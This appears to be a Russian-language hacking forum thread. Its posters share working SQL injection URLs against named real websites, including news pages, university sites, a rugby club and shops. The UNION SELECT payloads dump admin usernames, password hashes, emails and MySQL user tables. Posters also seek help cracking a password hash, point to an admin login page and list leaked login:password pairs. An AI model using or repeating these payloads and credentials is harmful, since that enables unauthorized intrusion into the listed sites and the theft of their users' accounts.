ребята кто поможет с хешем $1$AOOiO7Zi$2he3AqhhFU8197ojSz9bn/ очень срочно нада базы непринимают пишут что некоректный но он таков и нада както его росшифравать сменя +++
Code: http://www.donny.co.uk/rovers/news.php?ID=-57+union+select+1,admin_id,3,4,5,6,admin_email,admin_pass,9,10,11+from+zenadmin/* В information_schema.tables подглядел еще таблицы: forums2_acl_users phplist_rssitem_user phplist_user_user ttrss_users Чтоб просмотреть их колонки надо будет зашифровать в hex.(Спасибо тохе ) Code: http://www.parkui.ru/news.php?id=-57+union+select+1,2,3,4,5,username,7,user_password,user_email,10+from+phpbb_users+limit+1,1/*
MySQL 4.0.27 но таблицу подобрал только одну да и то вряд ли полезную (да и колонки впадло подбирать) знать бы еще куда она смотрит там же есть IPB, но его таблицы тоже не нашел
там несложно догадаться email+name ://untp.kiev.ua/test.php?id=1%20union%20 select%201,2,concat_ws(0x3a,email,name),4,5,6+from+untp.ibf_members hash+salt ://untp.kiev.ua/test.php?id=1%20 union%20select%201,2,concat_ws(0x3a,converge_pass_hash,converge_pass_salt),4,5,6+from+untp.ibf_members_converge
в антибояне нет www.pchelenok.ru Уязвимость в скрипте который отображает товары: Code: http://www.pchelenok.ru/index.php?action=show_item&parent=1' Просмотр информации: Code: http://www.pchelenok.ru/index.php?action=show_item&parent=-00032308+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/* Информация о базе: Code: 4.1.22 [email protected] pchelenok_db
Я канешн понимаю что недохек, но таблицы хоть немного похожей на таблицу юзверей я не нашел, да БД мне заявила что таблицы parol не существует, хотя как видно из урла ниже она там есть. Code: http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,table_name,6+from+information_schema.tables/* А вот и колонки таблицы парол Code: http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,column_name,6+from+information_schema.columns+where+table_name=0x7061726f6c/* Мож вы разберетесь...
Ув. тов. SUBJECT617, все очень просто: БД, с которой работает скрипт называется "mitsubis_auto", а таблица parol в БД "test". Правильный запрос будет: Code: http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,unhex(hex(passvord)),6+from+test.parol/* Вы не учитываете поле таблицы INFORMATION_SCHEMA.TABLES table_schema.
Колонки mos_users Code: http://www.seacoastrugby.org/news.php?id=-174+union+select+1,2,column_name,4+from+information_schema.columns+where+table_name=0x6d6f735f7573657273/* Ну и собсно сам mos_users Code: http://www.seacoastrugby.org/news.php?id=-174+union+select+1,2,username,password+from+mos_users/* =================================================================================================== Code: http://www.umic.co.uk/about_umic/news.php?id=-123+union+select+1,user,password,4,5,6,7,8,9,10+from+mysql.user/* Code: http://www.umic.co.uk/about_umic/news.php?id=-123+union+select+1,name,password,4,5,6,7,8,9,10+from+nanoeprint.admin_user/*
http://favoriteagent.com/lcm/b/?p=30&agent=-94226 union select 1,2,version(),4/* Db:5.0.22 user:Mljones@localhost DB:F_agent Т.к mysql 5 кому нужно таблицы можно FROM INFORMATION_SCHEMA.TABLES выташить
Code: http://www.spektr-ksk.ru/news.php?id=73'+union+select+1,2,3,id,5+from+user/* Code: http://www.spektr-ksk.ru/news.php?id=73'+union+select+1,2,3,sername,5+from+user/* Как я понял столбец id и есть пасс, просто другого похожего нет =\ Гляньте сами если хотите: Code: http://www.spektr-ksk.ru/news.php?id=73'+union+select+1,2,3,column_name,5+from+information_schema.columns+where+table_name='user'/*
Итак приступим, edu, жЫрненькие? по мере возрастания PR : PR-5 Никаких дамперов и лимитов ручками. Не забываем, что мы сидим под thelea2_tla, соответственно вывести значения таблиц и колумнофф можно только из этой table_schema.Версия пятая, все таблицы на страницу. _________________________________________ PR-7 В дополнение к первой. Всё выводится сразу, но сидим под faculty, и нифига там интересного нет _________________________________________ PR-7 _________________________________________ PR-8 _________________________________________ Ещё накрутил с картоном, но здесь тематика вроде неразрешена, выкладывать не буду, и так найдёте
Добро пожаловать в корпорацию Биосфера! http://www.biosfera.biz/admin/login.php Code: http://www.biosfera.biz/news.php?id=0+union+select+1,2,login,4,passwd,6+from+account+limit+0,1/* Новость 'login' и ниже пасс непонятно в каком виде. Админка выше. Кто админ хз, всего 4 чела зарегины. Если кому надо будет сам разберется.
http://www.laemmle.com/viewmovie.php?mid=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,database(),user(),12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
Ещё еда, PR-6. Code: http://french.berkeley.edu/news/news_events_ind.php?id=-53+union+select+1,2,concat_ws(0x3A3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* 4.1.20-log::davidpet@localhost::french_dept_db
Знакомства на Prostitytki.ru - секс досуг интим услуги эротические рассказы порно истории досуг и интим с девушками. denis:tutkin kostya:kostya Onal.ru - эротика и фотографии а также Интим-услуги, девушек Москвы для состоятельных мужчин kostya:kostya denis:tutkin acburen:n0exsup611:[email protected] Знакомства - mobipage.ru p.kiev.ua - Разработка сайтов, создание сайтов, web дизайн, раскрутка сайтов -> Дизайн-студия "Полюс-Альфа" okna:12345:www.perfect-okna.ru www.setguul.mn
www.bmoca.org _http://www.bmoca.org/artist.php?id=-74+union+select+1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*